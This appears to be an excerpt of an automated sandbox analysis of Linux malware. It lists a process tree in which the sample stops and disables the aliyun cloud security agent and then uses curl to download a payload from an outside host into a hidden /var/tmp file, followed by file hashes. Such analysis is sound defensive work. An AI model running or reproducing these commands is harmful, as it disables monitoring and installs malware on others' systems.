  - [2] /usr/sbin/service: service aliyun.service stop (PID 1889)
    - [3] /usr/bin/basename: basename /usr/sbin/service (PID 1893)
    - [3] /usr/bin/basename: basename /usr/sbin/service (PID 1894)
    - [3] /bin/systemctl: systemctl --quiet is-active multi-user.target (PID 1895) {Disables AppArmor}
    - [3] /bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (PID 1898)
    - [3] /bin/systemctl: systemctl list-unit-files --full "--type=socket" (PID 1897) {Disables AppArmor}
  - [2] /usr/local/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service (PID 1889) {Disables AppArmor}
  - [2] /usr/local/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service (PID 1889) {Disables AppArmor}
  - [2] /usr/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service (PID 1889) {Disables AppArmor}
  - [2] /usr/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service (PID 1889) {Disables AppArmor}
  - [2] /sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service (PID 1889) {Disables AppArmor}
  - [2] /bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service (PID 1889) {Disables AppArmor}
  - [2] /bin/systemctl: systemctl disable aliyun.service (PID 1905) {Disables AppArmor}
  - [2] /usr/bin/curl: curl https://w1ndows.fun:8443/docker.tar.gz -o /var/tmp/.docker.tar.gz (PID 1909)
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 5B
MD5: 727479ef7cedf30c03459bec7d87b0f0
SHA1: 2082e7f715f058acab2398d25d135cf5f4c0ce41
SHA256: 29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA512: 4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba